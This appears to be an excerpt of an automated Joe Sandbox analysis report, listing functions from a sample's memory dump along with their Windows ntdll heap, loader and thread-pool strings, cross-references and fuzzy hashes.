                                                                                                                                                                                                                                  • Instruction ID: 0c20df10e2994f85aad80bb07014a94fe4754092810d8f7b4e96f938d1f0a2ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8652a9b74d9bec289e7b5d043aafa365e1b94b49d7930f9c78abe0516d5161b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62512332611245EFDB11DFAED884EAABBE4FF14A68F24885FF4019F231C675D940CA61
                                                                                                                                                                                                                                  Function 0149F113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                  • Opcode ID: 7698bb2d7813e98cfbd3b84b74164cd32b6134a2e8cc430a01818b9f6f4c5fb8
                                                                                                                                                                                                                                  • Instruction ID: 701b6c34cba6079a459ff33620f6211bc931e942f1de189511876b58f7e5a8b3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7698bb2d7813e98cfbd3b84b74164cd32b6134a2e8cc430a01818b9f6f4c5fb8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD42DB716082829FCB15CF29C484A6BBFE5FF94604F08496FE995CB362D734D84ACB52
                                                                                                                                                                                                                                  Function 014BB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                                                  • Opcode ID: c84d894aeda07f8a08fae6fc2c37c0543186a1fbc8e1a1a68b8b8cefdf08cdb7
                                                                                                                                                                                                                                  • Instruction ID: 4e4c9b7d35ae8358f4cf6338432f5cbf9d26264ecfcf278929e175b7b35181b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84d894aeda07f8a08fae6fc2c37c0543186a1fbc8e1a1a68b8b8cefdf08cdb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C12430A006169BDB2A8BA9C8C5BFFBBA5FF55700F14406BE9029F2F0D7749945C3A0
                                                                                                                                                                                                                                  Function 014D631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                                                                                                  • Opcode ID: 5906fe534e7e759e1871a0a12c81d7d461fe875d88a6be4be22be56e08d2d1ee
                                                                                                                                                                                                                                  • Instruction ID: 0dcc92a4bfd422a7ec953e550756101b682a2bd62d822f37d147f4203fa5eb36
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5906fe534e7e759e1871a0a12c81d7d461fe875d88a6be4be22be56e08d2d1ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8918A70A00312DBEF36DF29C855B6E7BA1BB51724F12002FE6116F3A5DBB45806C792
                                                                                                                                                                                                                                  Function 0154F0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                                  • API String ID: 0-1745908468
                                                                                                                                                                                                                                  • Opcode ID: a180aa2b73204cf9b6829e3074509cede262abac2219542adb6c8b7f9dcb7953
                                                                                                                                                                                                                                  • Instruction ID: a5d9657e51efb39c00af470fea4673bd3c856a87d385da5d5235d924a720044b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a180aa2b73204cf9b6829e3074509cede262abac2219542adb6c8b7f9dcb7953
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA91FB31A046469FDB22DFADD840AADBBF2FF69718F19844FE441AF262C7359941CB10
                                                                                                                                                                                                                                  Function 0149640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 01496446
                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F977C
                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9790
                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 014F9783, 014F9796, 014F97BF
                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F97B9
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014F97A0, 014F97C9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                                                                  • Opcode ID: ce9f1864fa5ffee1066b88dae342df4ef28e3ac243592a3afeaa9be5dcaf5db6
                                                                                                                                                                                                                                  • Instruction ID: 1ad38316bcb9e106c7e08e2320d5af2e40cad4bd700b4ba1cd827fd77de6870d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce9f1864fa5ffee1066b88dae342df4ef28e3ac243592a3afeaa9be5dcaf5db6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D51CE712083019FE721EF25D891FAB7BE4FB94648F01091FFA959B270D6309905DB92
                                                                                                                                                                                                                                  Function 014DC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 014DC5E4
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01517F8C, 01518000
                                                                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01517FF0
                                                                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01517F7B
                                                                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 01517F82, 01517FF6
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014DC5E3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                                                                  • Opcode ID: 5b45ca269c79a37ea45b3dba1b2b25aa938a1a31a4ffd8ed07b0ba39c99eac23
                                                                                                                                                                                                                                  • Instruction ID: a7fcff9456e9b0472fe72840e3330c223e70fe33da7232c2f858389b77a7958d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b45ca269c79a37ea45b3dba1b2b25aa938a1a31a4ffd8ed07b0ba39c99eac23
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 113102716043029FD625EF29D895E2EBBD1FFA4B10F01055EF984AF2A1E670DC04C7A2
                                                                                                                                                                                                                                  Function 014D2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01511F82
                                                                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01511F6A, 01511FA4, 01511FC4
                                                                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01511FA9
                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01511FC9
                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01511F8A
                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01511F6F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                                                                  • Opcode ID: 842f0b194582fed9bcbf7920c19212f3c59b45b115d5bae197d46640a2581a7d
                                                                                                                                                                                                                                  • Instruction ID: a2ebc0af00496f3f500c26a9e8979e5fc1b6e7cf99dbd01fd6d14f8c4a6c70e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 842f0b194582fed9bcbf7920c19212f3c59b45b115d5bae197d46640a2581a7d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF312B72B002257BFB119A968C95F5F7A68EB61A50F14049AFB147B264D3B0EE01C7F0
                                                                                                                                                                                                                                  Function 014C510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 014C5272
                                                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 014C534B
                                                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 014C519B
                                                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 014C5167
                                                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 014C514A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                                                  • Opcode ID: 67b8b457022485b35bc095be94faf5d19374cfa6a493a18fe61b2b6eb3fb618f
                                                                                                                                                                                                                                  • Instruction ID: 97a419b5dedaa6740c823725bddc469114aa664c7dfef24615bf2fa64654e67a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67b8b457022485b35bc095be94faf5d19374cfa6a493a18fe61b2b6eb3fb618f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AF11075E00119EFDB12DF99C980AEEBBF8FF58A50F15406FE505AB260D7709E018BA0
                                                                                                                                                                                                                                  Function 014AA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                  • API String ID: 0-379654539
                                                                                                                                                                                                                                  • Opcode ID: d48524385d8944081e07ac5207fb2b008bac7ee19969577b567d8064b90acc0c
                                                                                                                                                                                                                                  • Instruction ID: c894028a7b23976d6380a01fc3dab8347e0db49035f7981ce45570b3eb2a1b6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d48524385d8944081e07ac5207fb2b008bac7ee19969577b567d8064b90acc0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21C1BC70108382CFD722CF59C044B6ABBE4BFA4704F55496EF9868B3A1E774C94ACB56
                                                                                                                                                                                                                                  Function 014D8322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D847E
                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 014D8342
                                                                                                                                                                                                                                  • @, xrefs: 014D84B1
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 014D8341
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-1918872054
                                                                                                                                                                                                                                  • Opcode ID: 408d915327b4837084b45af418486e468798f24fcb744e161798d03c46310b56
                                                                                                                                                                                                                                  • Instruction ID: 8c5e2a68f611d7b21f3e8f601394b6997abb7921ced4d25f08256d67b81dd8b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 408d915327b4837084b45af418486e468798f24fcb744e161798d03c46310b56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4919171508342AFEB22DE65C854EBFBBECBB94744F40092FF68496161E374D944CB62
                                                                                                                                                                                                                                  Function 014A63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01500DEC
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01500E72
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01500E2F
                                                                                                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01500EB5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                                                                                                  • Opcode ID: 4ea499ce5c329f7bb87773ad782e8e21bcf80137cc7402abb183b41cd379bcdc
                                                                                                                                                                                                                                  • Instruction ID: cd22e0c1a2cf49b452b2f9a6591a50a940e840f0f056e78f5e7ff428bd3a5e4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ea499ce5c329f7bb87773ad782e8e21bcf80137cc7402abb183b41cd379bcdc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D71F071904306AFCB61DF55C884F9B7FA9EFA4750F45046EF9488B2A6C334D588CB92
                                                                                                                                                                                                                                  Function 0149F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                                                                                  • API String ID: 0-2586055223
                                                                                                                                                                                                                                  • Opcode ID: a6d3c655e5ac84505f0eae0073453ee3aee48996aea97acf74842a6001ca29f1
                                                                                                                                                                                                                                  • Instruction ID: 600a94b2cda64ecb6e07158e924b6606821ca60e5807bd7109061396148b4f28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6d3c655e5ac84505f0eae0073453ee3aee48996aea97acf74842a6001ca29f1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F61E2322043419FE722DB6AC944F67BBE8EB94B50F06045FFA549B3B1D634E905C762
                                                                                                                                                                                                                                  Function 014C237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 014C2382
                                                                                                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0150A7A5
                                                                                                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0150A79F
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0150A7AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                                                                                                  • Opcode ID: 207c3909bb2dc8e9b86c490578933a13bb7ed195bdfdc417ec42b61c33ed738a
                                                                                                                                                                                                                                  • Instruction ID: a88c12d142903730c58e25330938752c9583d2cbdc43797c38e0e62da85222ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 207c3909bb2dc8e9b86c490578933a13bb7ed195bdfdc417ec42b61c33ed738a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E316872A00301EBEB329FADC881E6E77B4FB80B00F16402EE9116F2A5D7B05947D751
                                                                                                                                                                                                                                  Function 014990F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                                                                                                  • Opcode ID: d1eaaeeb9a83b9843c3e3de6ad4dd52058174364dc1cf412282a02dde97fb2cf
                                                                                                                                                                                                                                  • Instruction ID: d90764bac6e325d11ca301040fa178b2bef01adfe8de41169cc10ebc8c88984d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1eaaeeb9a83b9843c3e3de6ad4dd52058174364dc1cf412282a02dde97fb2cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C532A00105EFDB11DB5ADC89FAABBB8FB85A60F14405FE505AB3B1D770E940CA60
                                                                                                                                                                                                                                  Function 01549060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $ $0
                                                                                                                                                                                                                                  • API String ID: 0-3352262554
                                                                                                                                                                                                                                  • Opcode ID: 64ea184501f1cd3df2fe59e9c3a24f9d5b7e2cba8e31c237bb0fb6da491070da
                                                                                                                                                                                                                                  • Instruction ID: 378f13c7856b8eb370729ab5a3896eb11afc165b569c28f5aa8127ce03b98ff8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64ea184501f1cd3df2fe59e9c3a24f9d5b7e2cba8e31c237bb0fb6da491070da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B232F5B16083818FE760CF68C485B9BBBE5BFC8348F04492EF5998B251D775E948CB52
                                                                                                                                                                                                                                  Function 014A1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 014A1648
                                                                                                                                                                                                                                  • HEAP: , xrefs: 014A14B6
                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 014A1632
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                                                                                                  • Opcode ID: f7801bade98061e0c04cc6425bd0096a3c3352a55bbb8c91937b4b518189cb16
                                                                                                                                                                                                                                  • Instruction ID: ef85bb5340666341d62de4a453cfd53e8acded31d007ab7ad1bb7b0a665cd6ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7801bade98061e0c04cc6425bd0096a3c3352a55bbb8c91937b4b518189cb16
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7DE10230A042459BDB29CF2CC4506BBBBF1EF68700F59886EE596CB366E334E945CB50
                                                                                                                                                                                                                                  Function 014CF4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015100C7
                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 01510128
                                                                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015100F1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                                                                  • Opcode ID: 3c4461576b8a1bdaee3d70710b9f5cdea400058953724fd99714ef616c1c9535
                                                                                                                                                                                                                                  • Instruction ID: 458c6415f755ef378170450b96e4a76b16faacc3f38b90c74a11a8a8db961e4f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c4461576b8a1bdaee3d70710b9f5cdea400058953724fd99714ef616c1c9535
